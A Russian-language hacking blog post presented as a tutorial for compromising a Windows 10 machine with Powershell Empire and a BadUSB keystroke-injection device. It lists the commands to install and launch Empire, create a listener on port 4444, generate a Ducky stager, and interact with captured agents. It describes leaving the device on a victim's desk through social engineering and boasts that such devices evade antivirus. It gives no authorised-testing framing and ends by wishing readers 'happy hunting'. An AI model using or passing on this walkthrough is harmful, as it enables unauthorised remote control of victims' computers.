Hacking
July 16, 2022

Оружие хакера. Powershell Empire + BadUSB

В этой статье мы рассмотрим атаку с помощью фреймворка Powershell Empire в связке с простым BadUsb-устройством, которое можно купить на AliExpress.

Всем салют, дорогие друзья!
В этой статье мы рассмотрим атаку с помощью фреймворка Powershell Empire в связке с простым BadUsb-устройством, которое можно купить на AliExpress.


Итак, для начала немного терминологии

  • BadUsb - это устройство, эмулирующее клавиатуру, способное автоматизировать различные процессы, например запуск вируса, форматирование диска или подключение к компьютеру хакера.
Такой вид устройств не палится антивирусами, ибо по факту не является вредоносным. Это обычная программируемая клавиатура, часто в виде флешки.

  • Powershell Empire - фреймворк для осуществления несанкционированного удалённого доступа посредством заготовленных полезных нагрузок.

С двумя основными терминами разобрались, можно двигаться дальше...


Установка Powershell Empire в Kali Linux

Да, по умолчанию данный фреймворк не установлен в наш любимый Kali Linux.

Если вы используете мобильную платформу Andrax, то в её состав инструментария, к счастью, входит Powershell-Empire:

Однако, установить его в Kali не составит труда:

sudo su - Получаем root-права;

apt update - Обновляем список пакетов;

apt install powershell-empire - Устанавливаем фреймворк;

apt install starkiller - Устанавливаем интерфейс для фреймворка.


Запуск

  • После успешной установки можно приступить к запуску следующей командой:

powershell-empire

  • Однако, в таком случае, нам отобразятся лишь варианты запуска:
  • Чтобы правильно запустить данный инструмент для наших целей - нужно выполнить следующие команды:

powershell-empire server - запускаем серверную часть (дожидаемся полного запуска);

powershell-empire client - запускаем клиентскую часть.


Решение возможных проблем

  • Если возникают ошибки наличия tkinter и pyperclip - выполняем следующие команды для их установки:

apt install python3-tk

pip3 install pyperclip

  • После вновь пробуем запустить.

Понятия инструмента

Здесь нам нужно учесть следующие понятия, чтобы понять как работает данный инструмент:

Listener - это процесс прослушивания порта, то есть ожидания подключения к нашей машине со стороны жертвы;

Stager - это загрузчик полезной нагрузки на устройство жертвы;

Payload - это и есть полезная нагрузка, которая позволяет иметь доступ к системе и управлять ею;

Module - это код, который выполняется агентом для достижения определённых целей;

Agent - это наша захваченная цель, то есть устройство, к которому мы имеем доступ.


Взлом на практике

Попробуем создать ситуацию, при которой мы получим доступ к незащищённой Windows 10 посредством социальной инженерии, использовав BadUsb-устройство.

  • Для начала создаём Listener:
uselistener [Клавиша TAB]
  • На выбор достаточно вариантов. Я возьму http:
  • Смотрим на отображённых опциях, что необходимо настроить и соответственно настраиваем:

set Port 4444

set Name l1

  • Обновляем отображение опций и сверяем настройки:

options

  • Сохраняем:

execute

  • Возвращаемся назад и создаём Stager:

back

usestager [клавиша TAB]

Здесь есть загрузчики для операционных систем Windows, Mac OS X и основанных на ядре Linux.
  • В качестве примера я выберу windows/ducky:
  • Также настраиваем:

set Listener l1

execute

  • Смотрим, в какую папку сохранён скрипт, находим его через файловый менеджер и открываем:

Как видите, у нас имеется полноценный скрипт для BadUsb-устройства, который можно прошить и заставить с помощью социальной инженерии использовать нашей жертвой, например оставив его на рабочем столе целевого хоста.

  • Ждём, когда выполнится HID-инъекция скрипта и получаем доступ к хосту.
  • Для управления захваченными машинами переходим в Agents:

back

agents

  • И вы увидите всех захваченных агентов:
  • Итак, вот и установилось наше соединение с жертвой.
  • Вводим команду для подключения:

interact <Agent ID>

  • Для убийства сессии или ожидания подключения - используется команда kill:
Пример убийства сессии с агентом

На этом мы заканчиваем сегодняшнюю статью и желаем вам удачной охоты!

👉Да, хочу!ᅠ